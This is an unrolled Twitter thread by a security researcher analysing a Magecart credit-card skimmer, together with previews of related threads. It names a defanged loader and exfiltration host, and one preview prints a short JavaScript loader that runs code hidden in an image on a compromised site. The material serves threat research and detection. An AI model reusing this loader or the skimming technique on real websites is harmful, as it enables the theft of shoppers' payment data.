Profile picture
, 10 tweets, 3 min read
My Authors
Read all threads
Saw this new digital skimmer/#magecart JS for the first time last week. Haven't had time to dig really deep into it, but here's the basic overview. Calling it the Callback skimmer for now. Above average JS for a digital skimmer.

1/9
As I said, this is going to be a quick overview. Here's the loader:
gist.github.com/krautface/5a29…

2/9
That calls out to hxxps://jquery-cycle[.]com/analytics.js?q=0.44886615665744056 which returns the following code: gist.github.com/krautface/91c6…

It is encoded, but the Callback loader decodes it and runs it. If I recall correctly, that code just makes the same call again.

3/9
The code has added the same script tag to the header twice now. This was from another time it loaded, you can see the q= value is different, and I think this may affect some of the encoding, but I'm not 100% about that.

3.5/9
The second time, however, the actual skimmer comes through. Here's the second stage payload, which is much bigger than the first:

gist.github.com/krautface/3b3a…

4/9
The loader again decodes the payload and the result is this full skimmer.

gist.github.com/krautface/9ebc…

5/9
Lines 1-99 are two copies of some unrelated code, as far as I can tell it's originally from a plugin for protecting yourself from companies using the Canvas to fingerprint your browser. Another attempt at hiding the malicious JS from a quick review.

6/9
A couple of quick notes. Some standard anti-RE stuff in play here that's pretty easy to get rid of. Line 150 has what is likely the exfil URL:

hxxps://jquery-cycle[.]com/api/api.php

7/9
Line 233 is an encoded list of field names. Here they are decoded.

8/9
Anyways, like we've seen in other places recently, some of these skimmers are starting to look like they're built by actual devs, not just people pounding on JS until they get something that mostly works. Not that this code would pass a code review, but it's getting better.

9/9
Missing some Tweet in this thread? You can try to force a refresh.

Enjoying this thread?

Keep Current with Affable Kraut

Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

Twitter may remove this content at anytime, convert it as a PDF, save and print for later use!

Try unrolling a thread yourself!

how to unroll video

1) Follow Thread Reader App on Twitter so you can easily mention us!

2) Go to a Twitter thread (series of Tweets by the same owner) and mention us with a keyword "unroll" @threadreaderapp unroll

You can practice here first or read more on our help page!

Related hashtags

#magecart

More from @AffableKraut see all

Profile picture
Affable Kraut
@AffableKraut
New digital skimmer/#magecart technique: steganography

A colleague found this a couple of days ago while searching through our SIEM. The skimmer group uploads or modifies an existing image and appends the JS code.

1/5
Here's an example of a live image. You can load this image and prepend view-source: The next tweet has the code that loads and runs the code in this image. The full skimmer code is in a gist on the last tweet.

hxxps://www.truthinaging[.]com/media/wysiwyg/FreeShipping.jpg

2/5
var xhr = new XMLHttpRequest();
xhr.open('GET', '<image>', true);
xhr.send();
xhr.onreadystatechange = function() {
if (this.readyState != 4) return;
if (this.status == 200) {
var F=new Function (this.responseText.slice(-19704));
return(F());
}
}

3/5
Read 6 tweets
Profile picture
Affable Kraut
@AffableKraut
I think I stumbled upon a novel digital skimmer/#magecart script still in development and figured I'd share all the code and (limited) infrastructure I've found so far. And I'll share the simple method to stop this technique dead (tweet 16 😉)

First, what makes it unique?

1/17
- Malicious payload is loaded over websockets
- Exfil over websockets
- A rather clever skimmer loader that I think may fool a lot of people
- CSS classes(!) being used to construct the URL

Intrigued? Great. Let's go

2/x
Let's look at the skimmer loader. Look like anything you're used to seeing? querySelector, className, Canvas ondraw? What in the world? Where's the script tag created?

3/x
Read 17 tweets
Profile picture
Affable Kraut
@AffableKraut
Want to learn to hunt for some #magecart infrastructure? Then you've come to the right place. Going to walk you through how to do it, from the very start to the end. /thread (probably 30-35 tweets, so hope you're interested)
Just found a couple of domains that I haven't seen elsewhere, so if you stick through to the end you'll get to see newly discovered infrastructure. If you somehow knew of it already, let's talk, I'd be curious how you came upon them.
2/x
First, a disclaimer/ask: when you're doing this, you're going to find affected websites. There's lots and lots of them. Maybe don't name and shame the little guys? Takes about the same amount of time to send them a quick note as it does to highlight that they're affected.
3/x
Read 37 tweets

Related threads

Profile picture
G. Elliott Morris
@gelliottmorris
#NEW poll of the 2020 Democratic primary from The Economist and YouGov:

% support among likely voters (change vs last week)

Biden: 24 (-2)
Sanders: 19 (-5)
Warren: 18 (-2)
Buttigieg: 9 (2)
Bloomberg: 9 (4)
Klobuchar: 6 (1)
Yang: 3 (-1)
Gabbard: 3 (0)
Steyer: 2 (1)
Bennet: 1 (1)
Which candidates are Democrats considering voting for? (These numbers are from the past month of polls)

Biden: 48%
Warren: 47%
Sanders: 45%
Buttigieg: 28%
Bloomberg: 22%
Klobuchar: 20%
Yang: 16%
Steyer: 12%
Gabbard: 6%
Bennet: 4%
Patrick: 3%
Who would Democrats be disappointed in as the nominee?
(These numbers are from the past month of polls)

Gabbard: 43%
Bloomberg: 29%
Patrick: 23%
Biden: 23%
Steyer: 22%
Sanders: 22%
Bennet: 21%
Buttigieg: 19%
Klobuchar: 17%
Yang: 17%
Warren: 16%
Read 3 tweets
Profile picture
Alejandro Alvarez
@aletweetsnews
#NOW: Hundreds have taken to the Capitol steps demanding witnesses be allowed to testify in the Senate’s impeachment trial. Three warnings from the Capitol police are up and arrests are about to start. Leading them is Rev. William Barber.

#SwarmTheCapitol
The view from up top before the cops declared an unlawful assembly. Might be the first time I’ve seen an impeachment-related protest fill the whole approach to the Capitol’s east lawn. Though only a few dozen are risking arrest, the rest backed off.

#SwarmTheCapitol
Article 2, Section 4 of the Constitution (aka the impeachment process) in gigantic banner form, unfurled in the shadow of the Capitol rotunda - and quickly seized by the police.

#SwarmTheCapitol
Read 8 tweets
Profile picture
G. Elliott Morris
@gelliottmorris
#NEW poll of the 2020 Democratic primary from The Economist and YouGov:

% support among likely voters (chg vs last week):

Biden: 26 (-3)
Sanders: 24 (6)
Warren: 20 (-1)
Buttigieg: 7 (-1)
Klobuchar: 4 (0)
Bloomberg: 4 (-2)
Yang: 4 (0)
Gabbard: 3 (1)
Steyer: 1 (-2)
Patrick: 1 (0)
Who are Democrats considering voting for?

Biden: 49%
Warren: 48
Sanders: 45
Buttigieg: 28
Klobuchar: 20
Bloomberg: 19
Booker: 18
Yang: 16
Steyer: 12
Castro: 10
Gabbard: 6
Bennet: 4
Patrick: 3
Delaney: 2
Who would they be disappointed to see win the nomination?

Gabbard: 42%
Bloomberg: 31
Delaney: 25
Biden: 23
Steyer: 23
Patrick: 23
Bennet: 21
Sanders: 20
Buttigieg: 19
Yang: 17
Klobuchar: 17
Warren: 15
Read 5 tweets
Profile picture
Campaign for Accountability
@Accountable_Org
#NEW: CfA files ethics complaint against Florida State Rep. Scott Plakon for failing to disclose real estate empire. Read our press release here: 1/6
campaignforaccountability.org/watchdog-files…
CfA called on the Florida Commission on Ethics to investigate whether State Rep. Scott Plakon violated the Florida Constitution and state ethics laws by failing to properly disclose information about his myriad business interests on his personal financial disclosure forms. 2/6
Rep. Plakon is a member of the Florida House of Representatives, and he has represented his current seat, District 29, since 2014. As a member of the Florida Legislature, Rep. Plakon is required to file an annual Form 6, Full and Public Disclosure of Financial Interests. 3/6
Read 6 tweets
Profile picture
Xinqi Su
@XinqiSu
#NOW in Tsim Sha Tsui, umbrella-holding protesters have occupied Salisbury Rd and walked into Nathan Road. Not a huge crowd but many are waiting along roads from TST pier.
Cantonese is difficult but not too difficult
@ Nathan Rd, Tsim Sha Tsui
Hold it tight when storm looms - protesting couples in #AntiMaskBan march in Tsim Sha Tsui.
Chan Ka-ming, a pro-democracy district council candidate, is chanting slogan at a TST station exit on Nathan Rd.
Read 34 tweets
Profile picture
Richard James
@RichJamesBits
I have reached a whole new level of #PISSEDOFF.

I didnt think such a #dark and #scary state, or level, could be reached. It may top 12-14-17's causation. It's. That. Bad. So, I've prepared a statement...

docs.google.com/document/d/1_J…

#PascoSheriff #HaveYouAllNoShame @CigarCityBeer
Dear @FBI,
I must implore you ask your colleauges in @FBITampa to help research this new level of #PISSEDOFFNESS. As locals, they may offer a special indepth knowledge of this new level I have reached. This is not fair & law enforcement must #investigate. No one deserves this.
This is my #apogee of #Pissedoffness.
If #motherfuckers & #tears werent a noticable level.
If #HUSH or #INTIMIDATION tactics being deployed didnt strike a chord.
If #EVIDENCE, PROOF, or 30k Bonds didnt #WOW YOU.
If posting mom with no shred of investigatable value wasnt enough...
Read 463 tweets

Trending hashtags

#Materialism #BadNews #TrueStory #CapitalismIsSlavery #Algiers #PRC #Shoah #MAJORCRIME #TradeWar #Brazilian #MarxEngelsLeninStalin #Part2 #AntiMaskBan #rigged #GeneralElectionNow #FauxDeep #Qatar #cliche #sensible #Xenophobic #Syria #BadTurnOfEvents #UrbanLegends #Judges #crimeoftheweek
Follow Us on Twitter!

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just three indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3.00/month or $30.00/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!